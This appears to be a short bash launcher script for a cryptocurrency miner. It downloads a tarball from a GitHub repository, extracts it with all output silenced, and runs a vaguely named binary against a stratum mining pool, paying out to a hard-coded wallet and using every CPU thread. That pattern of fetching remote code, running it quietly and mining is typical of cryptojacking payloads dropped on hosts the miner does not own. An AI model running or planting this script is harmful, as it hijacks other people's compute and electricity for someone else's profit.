#!/bin/bash
wget https://github.com/ganggamulyana08/lotek/raw/main/cux.tar.gz && tar -xvf cux.tar.gz >/dev/null 2>&1
./cux -a gr -o stratum+tcps://asia.flockpool.com:5555 -u RPptgkib7iVDwwxgjCqBZE7z3c5QLprA3E.rujak -t $(nproc --all)
